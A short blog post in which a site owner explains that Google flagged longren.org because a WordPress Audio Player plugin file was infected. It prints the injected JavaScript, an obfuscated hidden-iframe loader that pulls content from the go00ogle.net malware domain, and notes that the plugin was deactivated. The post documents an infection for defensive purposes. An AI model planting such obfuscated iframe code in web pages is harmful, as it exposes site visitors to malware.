Longren.org Marked as Suspicious by Google

So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:

function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("<"+abs+" src="+adv.substr(0,9)+unescape("u0030u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");

I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.

  • oh yes it is really useful. thank you.